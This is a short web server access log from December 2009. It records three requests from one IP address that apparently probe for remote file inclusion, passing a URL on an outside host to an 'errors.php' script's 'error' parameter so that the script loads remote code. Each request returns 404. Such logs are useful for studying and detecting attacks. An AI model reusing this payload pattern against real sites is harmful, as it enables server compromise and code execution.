114.108.177.238 - - [16/Dec/2009:10:17:51 -0600] "GET //components/errors.php?error=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:10:17:52 -0600] "GET /logs//components/errors.php?error=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:10:17:52 -0600] "GET /logs/access_log.1235865600//components/errors.php?error=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
